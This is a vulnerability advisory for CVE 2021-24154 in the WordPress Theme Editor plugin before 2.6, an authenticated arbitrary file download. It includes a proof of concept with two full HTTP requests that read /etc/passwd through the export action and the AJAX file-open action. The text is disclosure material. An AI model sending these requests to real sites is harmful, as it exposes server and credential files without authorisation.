Theme Editor < 2.6 – Authenticated Arbitrary File Download | CVE 2021-24154

Description

The plugin did not validate the GET file parameter before passing it to the download_file() function, allowing administrators to download arbitrary files on the web server, such as /etc/passwd

Edit (WPScanTeam): The AJAX action wp_ajax_mk_theme_editor_file_open could also be used to achieve the same thing and was reported & fixed as well.

Proof of Concept

https://drive.google.com/file/d/1pv3-AMtgV2Kb3W4OdKuX64vxIsroNe-O/view?usp=sharing

As admin, and with the related nonce (mk_nonce from /wp-admin/admin.php?page=theme_editor_theme), open /wp-admin/admin-post.php?action=mk_theme_editor_export_te_files&file=/etc/passwd&_wpnonce=NONCE

GET /wp-admin/admin-post.php?action=mk_theme_editor_export_te_files&file=/etc/passwd&_wpnonce=feed261905 HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=theme_editor_theme
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1


Via the mk_theme_editor_file_open AJAX action (nonce is from the tf_wpnonce parameter in /wp-admin/admin.php?page=theme_editor_theme)

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=theme_editor_theme
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 115
Origin: https://example.com
Connection: close
Cookie: [admin cookies]

action=mk_theme_editor_file_open&path=/etc/passwd&_wpnonce=d0677226d1